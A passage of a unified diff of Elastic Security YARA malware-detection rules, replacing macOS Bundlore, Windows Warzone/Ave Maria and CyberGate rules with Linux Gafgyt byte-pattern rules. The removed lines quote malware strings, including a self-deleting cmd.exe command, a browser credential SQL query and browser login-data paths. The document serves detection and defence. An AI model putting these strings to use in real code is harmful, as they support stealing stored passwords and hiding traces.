"14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1207-L1225" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "4384536817bf5df223d4cf145892b7714f2dbd1748930b6cd43152d4e35c9e56" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0" + fingerprint = "8ee116ff41236771cdc8dc4b796c3b211502413ae631d5b5aedbbaa2eccc3b75" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q " ascii fullword - $a2 = "SMTP Password" wide fullword - $a3 = "select signon_realm, origin_url, username_value, password_value from logins" ascii fullword - $a4 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" wide fullword - $a5 = "for /F \"usebackq tokens=*\" %%A in (\"" wide fullword - $a6 = "\\Torch\\User Data\\Default\\Login Data" wide fullword - $a7 = "/n:%temp%\\ellocnak.xml" wide fullword - $a8 = "\"os_crypt\":{\"encrypted_key\":\"" wide fullword - $a9 = "Hey I'm Admin" wide fullword - $a10 = "\\logins.json" wide fullword - $a11 = "Accounts\\Account.rec0" ascii fullword - $a12 = "warzone160" ascii fullword - $a13 = "Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper" wide fullword + $a = { 0B E5 24 30 1B E5 2C 30 0B E5 1C 00 00 EA 18 30 1B E5 00 30 } condition: - 8 of ($a*) + all of them } -rule ELASTIC_Macos_Trojan_Bundlore_28B13E67 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_D2953F92 : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "28b13e67-e01c-45eb-aae6-ecd02b017a44" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0b50a38749ea8faf571169ebcfce3dfd668eaefeb9a91d25a96e6b3881e4a3e8" - logic_hash = "586ae19e570c51805afd3727b2e570cdb1c48344aa699e54774a708f02bc3a6f" + id = "d2953f92-62ee-428d-88c5-723914c88c6e" + date = "2021-06-28" + modified = "2021-09-16" + reference = "14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1227-L1245" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "d0af462d26f6ffe469c57d63f1f7d551e3fb9cc39c7e4c35b3e71f659c01c076" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1e85be4432b87214d61e675174f117e36baa8ab949701ee1d980ad5dd8454bac" + fingerprint = "276c6d62a8a335d0e2421b6b5b90c2c0eb69eec294bc9fcdeb7743abbf08d8bc" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 05 A5 A3 A9 37 D2 05 13 E9 3E D6 EA 6A EC 9B DC 36 E5 76 A7 53 B3 0F 06 46 D1 } + $a = { 1B E5 2A 00 53 E3 0A 00 00 0A 30 30 1B E5 3F 00 53 E3 23 00 } condition: all of them } -rule ELASTIC_Macos_Trojan_Bundlore_75C8Cb4E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_6Ae4B580 : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "75c8cb4e-f8bd-4a2c-8a5e-8500e12a9030" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3d69912e19758958e1ebdef5e12c70c705d7911c3b9df03348c5d02dd06ebe4e" - logic_hash = "527fecb8460c0325c009beddd6992e0abbf8c5a05843e4cedf3b17deb4b19a1c" + id = "6ae4b580-f7cf-4318-b584-7ea15f10f5ea" + date = "2021-06-28" + modified = "2021-09-16" + reference = "14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1247-L1265" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "eb0fe44df1c995c5d4e3a361c3e466f78cb70bffbc76d1b7b345ee651b313b9e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "db68c315dba62f81168579aead9c5827f7bf1df4a3c2e557b920fa8fbbd6f3c2" + fingerprint = "279e344d6da518980631e70d7b1ded4ff1b034d24e4b4fe01b36ed62f5c1176c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 EE 19 00 00 EA 80 35 E8 19 00 00 3B 80 35 E2 19 00 00 A4 80 35 DC 19 00 00 } + $a = { 30 0B E5 3C 20 1B E5 6C 32 1B E5 03 00 52 E1 01 00 00 DA 6C } condition: all of them } -rule ELASTIC_Macos_Trojan_Bundlore_17B564B4 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_D608Cf3B : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "17b564b4-7452-473f-873f-f907b5b8ebc4" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "94f6e5ee6eb3a191faaf332ea948301bbb919f4ec6725b258e4f8e07b6a7881d" - logic_hash = "40cd2a793c8ed51a8191ecb9b358f50dc2035d997d0f773f6049f9c272291607" + id = "d608cf3b-c255-4a8d-9bf1-66f92eacd751" + date = "2021-06-28" + modified = "2021-09-16" + reference = "14cc92b99daa0c91aa09d9a7996ee5549a5cacd7be733960b2cf3681a7c2b628" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1267-L1285" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "ad5b7d32c85adc7f778a8f4815e595b90a6f15dec048bcf97c6ab179582eb4f7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7701fab23d59b8c0db381a1140c4e350e2ce24b8114adbdbf3c382c6d82ea531" + fingerprint = "3825aa1c9cddb46fdef6abc0503b42acbca8744dd89b981a3eea8db2f86a8a76" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 D9 11 00 00 05 80 35 D3 11 00 00 2B 80 35 CD 11 00 00 F6 80 35 C7 11 00 00 } + $a = { FF 2F E1 7E 03 00 00 78 D8 00 00 24 00 00 00 28 00 00 00 4C } condition: all of them } -rule ELASTIC_Macos_Trojan_Bundlore_C90C088A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_3F8Cf56E : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "c90c088a-abf5-4e52-a69e-5a4fd4b5cf15" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "875513f4ebeb63b9e4d82fb5bff2b2dc75b69c0bfa5dd8d2895f22eaa783f372" - logic_hash = "c82c5c8d1e38e0d2631c5611e384eb49b58c64daeafe0cc642682e5c64686b60" + id = "3f8cf56e-a8cb-4c03-8829-f1daa3dc64a8" + date = "2021-06-28" + modified = "2021-09-16" + reference = "1878f0783085cc6beb2b81cfda304ec983374264ce54b6b98a51c09aea9f750d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1287-L1305" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "b2cf8b1913a88e6a6346f0ac8cd2e7c33b41d44bf60ff7327ae40a2d54748bd9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c2300895f8ff5ae13bc0ed93653afc69b30d1d01f5ce882bd20f2b65426ecb47" + fingerprint = "77306f0610515434371f70f2b42c895cdc5bbae2ef6919cf835b3cfe2e4e4976" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 E1 11 00 00 92 80 35 DB 11 00 00 2A 80 35 D5 11 00 00 7F 80 35 CF 11 00 00 } + $a = { 45 2F DA E8 E9 CC E4 F4 39 55 E2 9E 33 0E C0 F0 FB 26 93 31 } condition: all of them } -rule ELASTIC_Macos_Trojan_Bundlore_3965578D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_Fb14E81F : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "3965578d-3180-48e4-b5be-532e880b1df9" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L81-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d72543505e36db40e0ccbf14f4ce3853b1022a8aeadd96d173d84e068b4f68fa" - logic_hash = "6bd24640e0a3aa152fcd90b6975ee4fb7e99ab5f2d48d3a861bc804c526c90b6" + id = "fb14e81f-be2a-4428-9877-958e394a7ae2" + date = "2022-01-05" + modified = "2022-01-26" + reference = "0fd07e6068a721774716eb4940e2c19faef02d5bdacf3b018bf5995fa98a3a27" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1307-L1325" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "2efb958c269640c374485502611372f4404cf35d7ab704d20ce37b8c1f69645d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e41f08618db822ba5185e5dc3f932a72e1070fbb424ff2c097cab5e58ad9e2db" + fingerprint = "12b430108256bd0f57f48b9dbbea12eba7405c0b3b66a1c4b882647051f1ec52" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 33 2A 00 00 60 80 35 2D 2A 00 00 D0 80 35 27 2A 00 00 54 80 35 21 2A 00 00 } + $a = { 4E 45 52 00 53 43 41 4E 4E 45 52 20 4F 4E 20 7C 20 4F 46 46 00 } condition: all of them } -rule ELASTIC_Macos_Trojan_Bundlore_00D9D0E9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_E09726Dc : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "00d9d0e9-28d8-4c32-bc6f-52008ee69b07" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "73069b34e513ff1b742b03fed427dc947c22681f30cf46288a08ca545fc7d7dd" - logic_hash = "535831872408caa27984190d1b1b1a5954e502265925d50457e934219598dbfd" + id = "e09726dc-4e6d-4115-b178-d20375c09e04" + date = "2022-01-05" + modified = "2022-01-26" + reference = "1e64187b5e3b5fe71d34ea555ff31961404adad83f8e0bd1ce0aad056a878d73" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1327-L1345" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "ebd00e593a7fcd46e36fd0ca213e1f82c0f4a94448b6fd605d35cea45a490493" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7dcc6b124d631767c259101f36b4bbd6b9d27b2da474d90e31447ea03a2711a6" + fingerprint = "614d54b3346835cd5c2a36a54cae917299b1a1ae0d057e3fa1bb7dddefc1490f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 8E 11 00 00 55 80 35 88 11 00 00 BC 80 35 82 11 00 00 72 80 35 7C 11 00 00 } + $a = { 00 00 48 83 EC 08 48 83 C4 08 C3 00 00 00 01 00 02 00 50 49 4E 47 } condition: all of them } -rule ELASTIC_Macos_Trojan_Bundlore_650B8Ff4 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_Ad12B9B6 : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "650b8ff4-6cc8-4bfc-ba01-ac9c86410ecc" - date = "2021-10-05" - modified = "2021-10-25" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L121-L139" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "78fd2c4afd7e810d93d91811888172c4788a0a2af0b88008573ce8b6b819ae5a" - logic_hash = "e8a706db010e9c3d9714d5e7a376e9b2189af382a7b01db9a9e7ee947e9637bb" + id = "ad12b9b6-2e66-4647-8bf3-0300f2124a97" + date = "2022-01-05" + modified = "2022-01-26" + reference = "f0411131acfddb40ac8069164ce2808e9c8928709898d3fb5dc88036003fe9c8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1347-L1365" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "72a85d14eb8ab78364ea2e8b89d9409c0046b14602f4a3415d829f4985fb2de3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4f4691f6830684a71e7b3ab322bf6ec4638bf0035adf3177dbd0f02e54b3fd80" + fingerprint = "46d86406f7fb25f0e240abc13e86291c56eb7468d0128fdff181f28d4f978058" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 8B 11 00 00 60 80 35 85 11 00 00 12 80 35 7F 11 00 00 8C 80 35 79 11 00 00 } + $a = { 4C 52 46 00 4B 45 46 31 4A 43 53 00 4B 45 46 31 51 45 42 00 } condition: all of them } -rule ELASTIC_Macos_Trojan_Bundlore_C8Ad7Edd : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_0535Ebf7 : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "c8ad7edd-4233-44ce-a4e5-96dfc3504f8a" - date = "2021-10-05" - modified = "2021-10-25" + id = "0535ebf7-844f-4207-82ef-e155ceff7a3e" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L141-L159" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d4915473e1096a82afdaee405189a0d0ae961bd11a9e5e9adc420dd64cb48c24" - logic_hash = "be09b4bd612bb499044fe91ca4e1ab62405cf1e4d75b8e1da90e326d1c66e04f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1367-L1385" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "77e18bb5479b644ba01d074057c9e2bd532717f6ab3bb88ad2b7497b85d2a5de" + logic_hash = "eb574468e9d371def0da74e6aba827272181399a84388a14ffb167ec6ebd40d1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c6a8a1d9951863d4277d297dd6ff8ad7b758ca2dfe16740265456bb7bb0fd7d0" + fingerprint = "2b9b17dad296c0a58a7efa1fb3f71c62bf849f00deb978c1103ab8a480290024" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 74 11 00 00 D5 80 35 6E 11 00 00 57 80 35 68 11 00 00 4C 80 35 62 11 00 00 } + $a = { F8 48 8B 04 24 6A 18 48 F7 14 24 48 FF 04 24 48 03 24 24 48 8D 64 } condition: all of them } -rule ELASTIC_Macos_Trojan_Bundlore_Cb7344Eb : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_32A7Edd2 : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "cb7344eb-51e6-4f17-a5d4-eea98938945b" - date = "2021-10-05" - modified = "2021-10-25" + id = "32a7edd2-175f-45b3-bf3d-8c842e4ae7e7" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L161-L179" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "53373668d8c5dc17f58768bf59fb5ab6d261a62d0950037f0605f289102e3e56" - logic_hash = "6b5e868dfd14e9b1cdf3caeb1216764361b28c1dd38849526baf5dbdb1020d8d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1387-L1405" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "79a75c8aa5aa0d1edef5965e1bcf8ba2f2a004a77833a74870b8377d7fde89cf" + logic_hash = "af26549c1cad0975735e2c233bc71e5e1b0e283d02552fdaea02656332ecd854" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6041c50c9eefe9cafb8768141cd7692540f6af2cdd6e0a763b7d7e50b8586999" + fingerprint = "d59183e8833272440a12b96de82866171f7ea0212cee0e2629c169fdde4da2a5" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 ED 09 00 00 92 80 35 E7 09 00 00 93 80 35 E1 09 00 00 16 80 35 DB 09 00 00 } + $a = { 75 FD 48 FD 45 FD 0F FD 00 FD FD 0F FD FD 02 00 00 48 FD 45 } condition: all of them } -rule ELASTIC_Macos_Trojan_Bundlore_753E5738 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_D7F35B54 : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "753e5738-0c72-4178-9396-d1950e868104" - date = "2021-10-05" - modified = "2021-10-25" + id = "d7f35b54-82a8-4ef0-8c8c-30a6734223e1" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L181-L199" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "42aeea232b28724d1fa6e30b1aeb8f8b8c22e1bc8afd1bbb4f90e445e31bdfe9" - logic_hash = "7a6907b51c793e4182c1606eab6f2bcb71f0350a34aef93fa3f3a9f1a49961ba" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1407-L1425" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "79a75c8aa5aa0d1edef5965e1bcf8ba2f2a004a77833a74870b8377d7fde89cf" + logic_hash = "d827e21c09b8dce65db293aa57b39f49f034537bb708471989ad64e653c479be" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c0a41a8bc7fbf994d3f5a5d6c836db3596b1401b0e209a081354af2190fcb3c2" + fingerprint = "d01db0f6a169d82d921c76801738108a2f0ef4ef65ea2e104fb80188a3bb73b8" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 9A 11 00 00 96 80 35 94 11 00 00 68 80 35 8E 11 00 00 38 80 35 88 11 00 00 } + $a = { FD 48 FD 45 FD 48 FD FD FD FD FD FD FD FD FD 48 FD 45 FD 66 } condition: all of them } -rule ELASTIC_Macos_Trojan_Bundlore_7B9F0C28 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_F11E98Be : FILE MEMORY { meta: - description = "Detects Macos Trojan Bundlore (MacOS.Trojan.Bundlore)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "7b9f0c28-181d-4fdc-8a57-467d5105129a" - date = "2021-10-05" - modified = "2021-10-25" + id = "f11e98be-bf81-480e-b2d1-dcc748c6869d" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Bundlore.yar#L201-L219" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fc4da125fed359d3e1740dafaa06f4db1ffc91dbf22fd5e7993acf8597c4c283" - logic_hash = "32abbb76c866e3a555ee6a9c39f62a0712f641959b66068abfb4379baa9a9da9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1427-L1445" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "79a75c8aa5aa0d1edef5965e1bcf8ba2f2a004a77833a74870b8377d7fde89cf" + logic_hash = "9b9122f0897610dff6b37446b3cecbfcec3dce8dc7e1934e78cc32d5f6ac9648" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dde16fdd37a16fa4dae24324283cd4b36ed2eb78f486cedd1a6c7bef7cde7370" + fingerprint = "8cdf2acffd0cdce48ceaffa6682d2f505c557b873e4f418f4712dfa281a3095a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 B6 15 00 00 81 80 35 B0 15 00 00 14 80 35 AA 15 00 00 BC 80 35 A4 15 00 00 } + $a = { FD 40 00 09 FD 21 FD FD 08 48 FD 80 3E 00 75 FD FD 4C 24 48 0F FD } condition: all of them } -rule ELASTIC_Windows_Trojan_Cybergate_517Aac7D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Gafgyt_8D4E4F4A : FILE MEMORY { meta: - description = "Detects Windows Trojan Cybergate (Windows.Trojan.CyberGate)" + description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" author = "Elastic Security" - id = "517aac7d-2737-4917-9aa1-c0bd1c3e9801" - date = "2022-02-28" - modified = "2022-04-12" + id = "8d4e4f4a-b3ea-4f93-ada2-2c88bb5d806d" + date = "2022-09-12" + modified = "2022-10-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CyberGate.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "07b8f25e7b536f5b6f686c12d04edc37e11347c8acd5c53f98a174723078c365" - logic_hash = "50e061d0c358655c03b95ccbe2d05e252501c3e6afd21dd20513019cd67e6147" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Gafgyt.yar#L1447-L1465" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "79a75c8aa5aa0d1edef5965e1bcf8ba2f2a004a77833a74870b8377d7fde89cf" + logic_hash = "11ee101a936f8e6949701e840ef48a0fe102099ea3b71c790b9a5128e5c59029" score = 75 - quality = 48 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "3d998bda8e56de6fd6267abdacffece8bcf1c62c2e06540a54244dc6ea816825" + fingerprint = "9601c7cf7f2b234bc30d00e1fc0217b5fa615c369e790f5ff9ca42bcd85aea12" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "IELOGIN.abc" ascii fullword - $a2 = "xxxyyyzzz.dat" ascii fullword - $a3 = "_x_X_PASSWORDLIST_X_x_" ascii fullword - $a4 = "L$_RasDefaultCredentials#0" ascii fullword - $a5 = "\\signons1.txt" ascii fullword + $a = { 50 00 FD FD 00 00 00 31 FD 48 FD FD 01 00 00 00 49 FD FD 04 } condition: all of them } -rule ELASTIC_Windows_Trojan_Cybergate_9996D800 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Lumma_693A5234 : FILE MEMORY { meta: - description = "Detects Windows Trojan Cybergate (Windows.Trojan.CyberGate)" + description = "Detects Windows Trojan Lumma (Windows.Trojan.Lumma)" author = "Elastic Security" - id = "9996d800-a833-4535-972b-3ee320215bb6" - date = "2022-02-28" - modified = "2022-04-12" + id = "693a5234-de8c-4801-8146-bb4d5378abc5" + date = "2024-06-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CyberGate.yar#L25-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = 